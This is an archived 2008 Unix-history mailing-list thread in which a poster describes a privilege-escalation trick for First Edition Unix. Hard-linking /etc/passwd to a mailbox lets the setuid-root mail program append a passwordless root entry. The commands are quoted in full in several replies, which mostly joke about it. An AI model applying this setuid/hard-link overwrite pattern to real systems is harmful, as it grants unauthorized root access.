* [TUHS] Some fun with 1st ed
@ 2008-05-03 19:20 Tim Newsham
2008-05-03 19:24 ` Larry McVoy
0 siblings, 1 reply; 5+ messages in thread
From: Tim Newsham @ 2008-05-03 19:20 UTC (permalink / raw)
All work and no play...
Here's a fun hack for first edition unix. From MAIL (I) :
When followed by the names of a letter and one or more people, the
letter is appended to each person's mailbox. Each letter is
preceded by the sender's name and a postmark.
A person is either the nameof an entry in the directory /usr, in
which case the mail is sent to /usr/person/mailbox, or the path
of a directory, in which case mailbox in that directory is used.
Mail is setuid root:
# ls -l /bin/mail
80 surwr- 1 root 3940 Jan 1 00:00:00 mail
login as a non-root user (ie "bin"), create a file "letter" with the
contents "hack::0:/:". Run:
@ ln /etc/passwd /tmp/mailbox
@ mail letter /tmp
log out and log back in as "hack". You are now root. Cat /etc/passwd
and notice:
From bin Jan 1 00:49:22
hack::0:/:
clean up the file a little and enjoy your new elevated status.
Tim Newsham
http://www.thenewsh.com/~newsham/
^ permalink raw reply [flat|nested] 5+ messages in thread
* [TUHS] Some fun with 1st ed
2008-05-03 19:20 [TUHS] Some fun with 1st ed Tim Newsham
@ 2008-05-03 19:24 ` Larry McVoy
2008-05-03 19:29 ` Wilko Bulte
0 siblings, 1 reply; 5+ messages in thread
From: Larry McVoy @ 2008-05-03 19:24 UTC (permalink / raw)
We need to send out a security alert immediately. This is serious.
On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> All work and no play...
>
> Here's a fun hack for first edition unix. From MAIL (I) :
>
> When followed by the names of a letter and one or more people, the
> letter is appended to each person's mailbox. Each letter is
> preceded by the sender's name and a postmark.
>
> A person is either the nameof an entry in the directory /usr, in
> which case the mail is sent to /usr/person/mailbox, or the path
> of a directory, in which case mailbox in that directory is used.
>
> Mail is setuid root:
>
> # ls -l /bin/mail
> 80 surwr- 1 root 3940 Jan 1 00:00:00 mail
>
> login as a non-root user (ie "bin"), create a file "letter" with the
> contents "hack::0:/:". Run:
>
> @ ln /etc/passwd /tmp/mailbox
> @ mail letter /tmp
>
> log out and log back in as "hack". You are now root. Cat /etc/passwd
> and notice:
>
> From bin Jan 1 00:49:22
> hack::0:/:
>
> clean up the file a little and enjoy your new elevated status.
>
> Tim Newsham
> http://www.thenewsh.com/~newsham/
> _______________________________________________
> TUHS mailing list
> TUHS at minnie.tuhs.org
> https://minnie.tuhs.org/mailman/listinfo/tuhs
--
---
Larry McVoy lm at bitmover.com http://www.bitkeeper.com
^ permalink raw reply [flat|nested] 5+ messages in thread
* [TUHS] Some fun with 1st ed
2008-05-03 19:24 ` Larry McVoy
@ 2008-05-03 19:29 ` Wilko Bulte
2008-05-03 19:34 ` Tim Newsham
2008-05-19 17:35 ` [Unix-jun72] " Angus Robinson
0 siblings, 2 replies; 5+ messages in thread
From: Wilko Bulte @ 2008-05-03 19:29 UTC (permalink / raw)
Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 ..
> We need to send out a security alert immediately. This is serious.
CERT to the rescue! Man the barricades !
;-)
> On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> > All work and no play...
> >
> > Here's a fun hack for first edition unix. From MAIL (I) :
> >
> > When followed by the names of a letter and one or more people, the
> > letter is appended to each person's mailbox. Each letter is
> > preceded by the sender's name and a postmark.
> >
> > A person is either the nameof an entry in the directory /usr, in
> > which case the mail is sent to /usr/person/mailbox, or the path
> > of a directory, in which case mailbox in that directory is used.
> >
> > Mail is setuid root:
> >
> > # ls -l /bin/mail
> > 80 surwr- 1 root 3940 Jan 1 00:00:00 mail
> >
> > login as a non-root user (ie "bin"), create a file "letter" with the
> > contents "hack::0:/:". Run:
> >
> > @ ln /etc/passwd /tmp/mailbox
> > @ mail letter /tmp
> >
> > log out and log back in as "hack". You are now root. Cat /etc/passwd
> > and notice:
> >
> > From bin Jan 1 00:49:22
> > hack::0:/:
> >
> > clean up the file a little and enjoy your new elevated status.
> >
> > Tim Newsham
> > http://www.thenewsh.com/~newsham/
> > _______________________________________________
> > TUHS mailing list
> > TUHS at minnie.tuhs.org
> > https://minnie.tuhs.org/mailman/listinfo/tuhs
>
> --
> ---
> Larry McVoy lm at bitmover.com http://www.bitkeeper.com
> _______________________________________________
> TUHS mailing list
> TUHS at minnie.tuhs.org
> https://minnie.tuhs.org/mailman/listinfo/tuhs
--- end of quoted text ---
--
Wilko
^ permalink raw reply [flat|nested] 5+ messages in thread
* [TUHS] Some fun with 1st ed
2008-05-03 19:29 ` Wilko Bulte
@ 2008-05-03 19:34 ` Tim Newsham
2008-05-19 17:35 ` [Unix-jun72] " Angus Robinson
1 sibling, 0 replies; 5+ messages in thread
From: Tim Newsham @ 2008-05-03 19:34 UTC (permalink / raw)
> Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 ..
>> We need to send out a security alert immediately. This is serious.
>
> CERT to the rescue! Man the barricades !
I did this once with a 7th edition vuln. I think one is probably the
limit :)
http://www.securityfocus.com/archive/1/365038
>> Larry McVoy lm at bitmover.com http://www.bitkeeper.com
> Wilko
Tim Newsham
http://www.thenewsh.com/~newsham/
^ permalink raw reply [flat|nested] 5+ messages in thread
* [Unix-jun72] [TUHS] Some fun with 1st ed
2008-05-03 19:29 ` Wilko Bulte
2008-05-03 19:34 ` Tim Newsham
@ 2008-05-19 17:35 ` Angus Robinson
1 sibling, 0 replies; 5+ messages in thread
From: Angus Robinson @ 2008-05-19 17:35 UTC (permalink / raw)
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20080519/5e492524/attachment.html>
^ permalink raw reply [flat|nested] 5+ messages in thread
end of thread, other threads:[~2008-05-19 17:35 UTC | newest]
Thread overview: 5+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2008-05-03 19:20 [TUHS] Some fun with 1st ed Tim Newsham
2008-05-03 19:24 ` Larry McVoy
2008-05-03 19:29 ` Wilko Bulte
2008-05-03 19:34 ` Tim Newsham
2008-05-19 17:35 ` [Unix-jun72] " Angus Robinson
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).